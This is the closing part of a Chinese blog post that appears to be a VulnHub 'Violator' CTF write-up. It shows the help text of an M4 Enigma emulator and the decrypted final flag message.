Emulates the Kriegsmarine M4 Enigma encryption machine

	Initial Setup Notes
Rotors: Reflector (B/C), Thin Rotor (B/G), 3 Rotors (1-8, can't reuse them) 
Use BB### or CG### with A### settings to read/create Wehrmacht three rotor traffic 
Ring and position settings: A-Z for each of the 4 rotors
Reflector setting is always fixed at A.
Plugboard settings: A-Z,A-Z pairs, also won't allow reuse
Hit return to end input, 11 pairs recomended for maximum security.
Hit ESC at any time to quit.

	Special Keys (during input mode)
1: rewind one setting
2: reset position settings
3: new position settings
4: new setup
9: toggle debug
0: show position settings
?: show help

see http://en.wikipedia.org/wiki/Enigma_machine
also http://www.bytereef.org/m4_project.html


Rotors: 
  • Google找在线的解密工具,解了也看不懂,没有空格分开翻译不了,反正flag拿到了。
ONEFINALCHALLENGEFORYOUBGHXCONGRATULATIONSFORTHEFOURTHTIMEONSNARFINGTHEFLAGONVIOLATORILLPRESUMEBYNOWYOULLKNOWWHATIWASLISTENINGTOWHENCREATINGTHISCTFIHAVEINCLUDEDTHINGSWHICHWEREDELIBERATLYAVOIDINGTHEOBVIOUSROUTEINTOKEEPYOUONYOURTOESANOTHERTHOUGHTTOPONDERISTHATBYABUSINGPERMISSIONSYOUAREALSOBYDEFINITIONAVIOLATORSHOUTOUTSAGAINTOVULNHUBFORHOSTINGAGREATLEARNINGTOOLASPECIALTHANKSGOESTOBENRANDGKNSBFORTESTINGANDTOGTMLKFORTHEOFFERTOHOSTTHECTFAGAINKNIGHTMARE
posted @ 2020-01-19 08:57  三米前有蕉皮  阅读(1477)  评论(0编辑  收藏  举报